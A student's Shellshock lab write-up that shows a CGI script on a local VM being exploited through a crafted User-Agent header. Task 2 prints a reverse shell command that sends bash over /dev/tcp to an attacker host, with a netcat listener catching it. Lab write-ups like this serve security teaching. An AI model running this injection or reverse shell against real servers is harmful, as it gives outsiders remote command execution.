Shellshock Lab

Attack on CGI programs

Pavan Hugar

Common Gateway Interface is usually used by web servers to run executable programs that dynamically
generate web pages. Usually CGI programs are shell scripts and hence use bash. Therefore, they may
be subjected to the shellshock attack. In this lab we will demonstrate how an attacked can use the
shellshock vulnerability to get a CGI program on a remote server to execute any arbitrary command.

Environment Setup:

Enable CGI in your VM (it's ok to ignore warning):

Download vulnerable bash binary from here: bash. Make the bash executable:

Link /bin/sh to the absolute path of our vulnerable bash program.

Task 1:

In this task, we will launch the Shellshock attack on a remote web server(Local system as of now). Many
web servers enable CGI, which is a standard method used to generate dynamic content on Web pages
and Web applications. Many CGI programs are written using a shell script. Therefore, before a CGI
program is executed, the shell program will be invoked first, and such an invocation is triggered by a user
from an attacker computer.

Myprog.cgi

#!/bin/sh
echo "Content-type: text/plain"
echo
echo
//echo "Hello World"
echo "*** Environment variables ***"
strings /proc/$$/environ

So for task1 we are going to create a cgi program with name Myprog.cgi and above code snippet shows
its content. What it does is just print out the all the environment variables associated with current process.

Next we will move the CGI program to the default CGI directory and make it executable:
 sudo cp myprog.cgi /usr/lib/cgi-bin/
sudo chmod 755 /usr/lib/cgi-bin/myprog.cgi

Let us use curl command to run the cgi program and see whether it works.

curl http://localhost/cgi-bin/myprog.cgi

from the above screenshot we see the list of environment variable of the current process.

Curl is a command line tool to transfer data from or to the server using one of the protocols. Here we use
the curl command to access the myprog.cgi program we created.

We use the curl command with user agent argument to pass values into the server and exploit the
shellshock vulnerability. we used the “ls with -l option” command to print the list of the files under working
directory of the running program which is /usr/lib/cgi-bin. We can see that it displayed the file name and
its attributes. This successfully shows that we could exploit the vulnerability to run the bash.

Curl command with user agent argument allows to pass values to the server. We use this to exploit the
shellshock vulnerability for CGI programs. In the user agent we pass a function followed by a semicolon
and then pass additional code that may be harmful to the system as single variable. So, when the curl
command is executed, the CGI program specified with in the URL is executed. The program is a shell
script and invokes bash shell. That time the bash shell tries to parse all variables and executes functions.
In this case, it recognizes that it is a function and not a variable, converts it to a function and executes it.
That time the code injected along will also be executed and hence in the above example ls -l is executed
and folder content is listed.

From the bash source code, we can see that if a function is defined as a variable, it converts it to a
function by replacing the = with a ‘ ‘ (space) and then executes it as shown in the parse_and_execute()
function. This is where the vulnerability is because if the user sends malicious code along with the

variable, the bash executes it after parsing it. Bash only checks for the first part of the function as
indicated in the screenshot and not rest of the function and if it contains multiple commands separated by
semicolons.

Hence, to maximize the damage, we are going to do reverse shell attack to control the server.

Task 2:
Gain reverse shell by exploiting the Shellshock vulnerability of the CGI program
From above screenshot we can see that first two lines shows that server is created on attacked machine
using netcat -l command and we are listening for request on port number 7070. This will let us persist the
connection between attacker machine and webserver.

Next, we have to execute the following reverse shell command in order to do successful attack.

/bin/bash -i > /dev/tcp/attacker_ip/7070 0<&1 2>&1

Therefore, we will use the reverse shell command as the parameter to curl user agent command as
shown in the below screenshot. If attack is successful we should be seeing the shell prompt of server
machine on the attacker machine [10.0.2.15].

Also on our first terminal we can see the netcat program accepts the connection causing the
shell prompt to be displayed. The shell prompt corresponds to the bash process triggered by CGI.

This can be observered from the below screenshot which shows the user ID of the remote CGI
process; WW-data@VM:/usr/lib/cgi-bin
Once we have shell whatever commands we write will be executed on the server directly.